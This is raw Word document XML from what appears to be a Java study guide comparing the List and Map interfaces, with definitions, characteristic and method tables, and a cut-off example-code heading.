    <w:p w14:paraId="67F1D3C5" w14:textId="77777777" w:rsidR="00FD4044" w:rsidRPr="00CE4B95" w:rsidRDefault="00FD4044">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="65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t</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Does not allow duplicates, order is not guaranteed (except in LinkedHashSet), and does not support index-based access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A500566" w14:textId="250A6D97" w:rsidR="00FD4044" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00FD404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42AB263">
          <v:rect id="_x0000_i1411" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4634C248" w14:textId="3693DE94" w:rsidR="00A52B66" w:rsidRPr="00CE4B95" w:rsidRDefault="00A52B66" w:rsidP="00A52B66">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="134" w:name="_Toc196307614"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Difference between List and Map?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="134"/>
    </w:p>
    <w:p w14:paraId="6DA2537E" w14:textId="20E4E237" w:rsidR="00E737CC" w:rsidRPr="00CE4B95" w:rsidRDefault="00E737CC" w:rsidP="00344244">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Java, List and Map are two core interfaces in the Java Collections Framework, and they have distinct characteristics. Here's a detailed comparison between them:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60DF06EB" w14:textId="77777777" w:rsidR="003D03A6" w:rsidRPr="00CE4B95" w:rsidRDefault="003D03A6" w:rsidP="00344244">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="076A01C9" w14:textId="26929807" w:rsidR="00E737CC" w:rsidRPr="00CE4B95" w:rsidRDefault="00E737CC"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Definition:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D33CFC" w14:textId="77777777" w:rsidR="00E737CC" w:rsidRPr="00CE4B95" w:rsidRDefault="00E737CC" w:rsidP="00344244">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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List</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AD75588" w14:textId="77777777" w:rsidR="00E737CC" w:rsidRPr="00CE4B95" w:rsidRDefault="00E737CC" w:rsidP="00344244">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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List is an ordered collection (sequence) of elements that allows duplicate elements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F90EE9" w14:textId="77777777" w:rsidR="00E737CC" w:rsidRPr="00CE4B95" w:rsidRDefault="00E737CC" w:rsidP="00344244">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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maintains the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>insertion order</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of elements and allows for </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>random access</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> by index.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ABDC594" w14:textId="77777777" w:rsidR="00E737CC" w:rsidRPr="00CE4B95" w:rsidRDefault="00E737CC" w:rsidP="00344244">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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implementations: ArrayList, LinkedList, Vector.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D519CCE" w14:textId="77777777" w:rsidR="00E737CC" w:rsidRPr="00CE4B95" w:rsidRDefault="00E737CC" w:rsidP="00344244">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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ap</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EF93CBE" w14:textId="77777777" w:rsidR="00E737CC" w:rsidRPr="00CE4B95" w:rsidRDefault="00E737CC" w:rsidP="00344244">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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Map is an object that maps keys to values. It does not allow duplicate keys but allows duplicate values.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A9BF774" w14:textId="77777777" w:rsidR="00E737CC" w:rsidRPr="00CE4B95" w:rsidRDefault="00E737CC" w:rsidP="00344244">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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represents a collection of key-value pairs, where each key is unique, and each key is associated with exactly one value.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C70D9FC" w14:textId="77777777" w:rsidR="00E737CC" w:rsidRPr="00CE4B95" w:rsidRDefault="00E737CC" w:rsidP="00344244">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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implementations: HashMap, TreeMap, LinkedHashMap.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30675EE8" w14:textId="77777777" w:rsidR="00E737CC" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0034424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13A857D">
          <v:rect id="_x0000_i1412" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="08B0B344" w14:textId="77777777" w:rsidR="00E737CC" w:rsidRPr="00CE4B95" w:rsidRDefault="00E737CC"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Key Characterist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66"/>
        <w:gridCol w:w="3966"/>
        <w:gridCol w:w="4972"/>
      </w:tblGrid>
      <w:tr w:rsidR="00344244" w:rsidRPr="00CE4B95" w14:paraId="7F8F9AFB" w14:textId="77777777" w:rsidTr="00E737CC">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7DD9E807" w14:textId="77777777" w:rsidR="00E737CC" w:rsidRPr="00CE4B95" w:rsidRDefault="00E737CC"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2BA75AD1" w14:textId="77777777" w:rsidR="00E737CC" w:rsidRPr="00CE4B95" w:rsidRDefault="00E737CC"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List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4E53CA95" w14:textId="77777777" w:rsidR="00E737CC" w:rsidRPr="00CE4B95" w:rsidRDefault="00E737CC"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Map</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00344244" w:rsidRPr="00CE4B95" w14:paraId="7F17B54C" w14:textId="77777777" w:rsidTr="00E737CC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="43397BC1"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ype of Elements</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0F4D7C99"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ores individual elements.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2AB1B91F"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ores key-value pairs (associates a key with a value).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00344244" w:rsidRPr="00CE4B95" w14:paraId="32FF179C" w14:textId="77777777" w:rsidTr="00E737CC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4B93190C"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uplicates</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6534C5B0"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lows duplicates. The same element can appear multiple times.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3490D318"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Does </w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>not allow duplicate keys</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>, but values can be duplicated.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00344244" w:rsidRPr="00CE4B95" w14:paraId="1AEDB5B9" w14:textId="77777777" w:rsidTr="00E737CC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7F3997FB"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rder</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5F886FFE"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intains insertion order (in most implementations).</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="103D4E33"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rder depends on the implementation (e.g., LinkedHashMap maintains insertion order, TreeMap sorts based on keys).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00344244" w:rsidRPr="00CE4B95" w14:paraId="40B86B85" w14:textId="77777777" w:rsidTr="00E737CC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2C6140B7"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 by Index</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="29FC8366"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 allows random access using an index.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5749AE81"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No, you access the value using the </w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>key</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> (not by index).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00344244" w:rsidRPr="00CE4B95" w14:paraId="530F803B" w14:textId="77777777" w:rsidTr="00E737CC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7E01B34A"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ull Elements</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="22482641"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llows </w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>null</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> values and a single </w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>null</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> key (in some cases like ArrayList).</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="44F05591"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llows </w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>null</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> values and </w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>null</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> keys (except in Hashtable which disallows both).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00344244" w:rsidRPr="00CE4B95" w14:paraId="2E93A93B" w14:textId="77777777" w:rsidTr="00E737CC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="14B72822"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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="518B6BE1"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when you need an ordered collection of elements, where duplicates are allowed.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6CB6742C"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when you need to associate a unique key with a value and retrieve data based on the key.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="71D00FFA" w14:textId="77777777" w:rsidR="00E737CC" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0034424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D1FF9E2">
          <v:rect id="_x0000_i1413" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5601D7F7" w14:textId="77777777" w:rsidR="00E737CC" w:rsidRPr="00CE4B95" w:rsidRDefault="00E737CC"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Common Method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7"/>
        <w:gridCol w:w="3496"/>
        <w:gridCol w:w="5001"/>
      </w:tblGrid>
      <w:tr w:rsidR="00344244" w:rsidRPr="00CE4B95" w14:paraId="39FAA813" w14:textId="77777777" w:rsidTr="00E737CC">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1FC6F92C" w14:textId="77777777" w:rsidR="00E737CC" w:rsidRPr="00CE4B95" w:rsidRDefault="00E737CC"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Method</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2F51C9AD" w14:textId="77777777" w:rsidR="00E737CC" w:rsidRPr="00CE4B95" w:rsidRDefault="00E737CC"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List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6FB2D0A1" w14:textId="77777777" w:rsidR="00E737CC" w:rsidRPr="00CE4B95" w:rsidRDefault="00E737CC"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Map</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00344244" w:rsidRPr="00CE4B95" w14:paraId="5F7506C4" w14:textId="77777777" w:rsidTr="00E737CC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="600EB6D8"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dd elements</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2F89636C"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dd(E element)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="44B7EFBD"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t(K key, V value)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00344244" w:rsidRPr="00CE4B95" w14:paraId="549700FD" w14:textId="77777777" w:rsidTr="00E737CC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="279176A1"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Get elements</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1280C7C5"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et(int index)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="717C9CC4"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et(Object key)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00344244" w:rsidRPr="00CE4B95" w14:paraId="3CE68664" w14:textId="77777777" w:rsidTr="00E737CC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="400DD86E"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ize</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6E34CABA"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ze()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7A522872"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ze()</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00344244" w:rsidRPr="00CE4B95" w14:paraId="714D1280" w14:textId="77777777" w:rsidTr="00E737CC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="72BE703C"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move elements</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0EE499B2"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move(int index) or remove(Object o)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="72E90AB7"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move(Object key)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00344244" w:rsidRPr="00CE4B95" w14:paraId="7D6FA6AE" w14:textId="77777777" w:rsidTr="00E737CC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="34CBBACD"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tains element</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="06CA1F85"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tains(Object o)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1327EB04"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tainsKey(Object key) or containsValue(Object value)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00344244" w:rsidRPr="00CE4B95" w14:paraId="6B718A2C" w14:textId="77777777" w:rsidTr="00E737CC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3F5A6430"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lear all elements</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="09C24C66"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ear()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7DF9990D"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ear()</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7DCE9CF6" w14:textId="77777777" w:rsidR="00E737CC" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0034424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EC21509">
          <v:rect id="_x0000_i1414" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A68879E" w14:textId="77777777" w:rsidR="00E737CC" w:rsidRPr="00CE4B95" w:rsidRDefault="00E737CC"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Example Code:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1727BB27"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st Example:</w:t>
      </w:r>
    </w:p>
